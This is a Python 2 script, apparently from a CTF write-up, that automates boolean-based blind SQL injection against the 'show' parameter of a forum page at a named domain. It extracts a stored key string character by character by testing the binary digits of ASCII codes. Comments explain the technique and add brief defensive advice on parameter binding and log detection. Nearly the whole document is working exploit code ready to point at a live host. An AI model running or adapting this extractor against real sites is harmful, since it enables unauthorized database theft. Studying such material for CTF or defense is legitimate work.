#!/usr/bin/python
import urllib2,urllib,time
# select database()
#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"
#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335
# Boolean-based blind SQL injection extractor from a CTF write-up (Python 2).
#
# The `show` query parameter of the forum page is concatenated into a SQL
# statement server-side, so a condition appended after "1 and" is evaluated
# by the database. The script reads the result of `target` one character at a
# time: for character position x it sends seven requests, each testing one
# digit of the character's ASCII code written as a 7-digit, zero-padded
# binary string (lpad(bin(ascii(...)),7,0)).
#
# Reviewer notes (defensive):
# - The LIKE pattern in `target` is a hex literal, so the payload contains no
#   quote characters; quote escaping or quote filtering alone would not block
#   it. The fix is a bound parameter (or a strict integer check) for `show`.
# - The traffic is easy to spot in access logs: seven sequential requests per
#   extracted character against the same parameter, each carrying
#   substr/ascii/bin/lpad keywords.
target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"
x = 0          # 1-based position of the character currently being read
answer = ""    # characters recovered so far
while True:
    x += 1
    ch = 0
    # i walks the seven binary digits from most significant (1) to least (7).
    for i in range(1, 8):
        att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#" % (target, x, i)
        url = "http://poworks.com/index.php/forum/?cid=0&show=" + urllib.quote(att)
        result = urllib2.urlopen(urllib2.Request(url)).read()
        # The script treats the presence of this page text as "condition
        # true", i.e. digit i of the binary string is 1.
        if "No replies posted yet." in result:
            ch += 1 << (7 - i)
    # All seven digits zero: no character at this position (presumably the
    # end of the result string), so stop.
    if ch == 0:
        break
    answer += chr(ch)
    print ":) : "+ answer
print "END : ",answer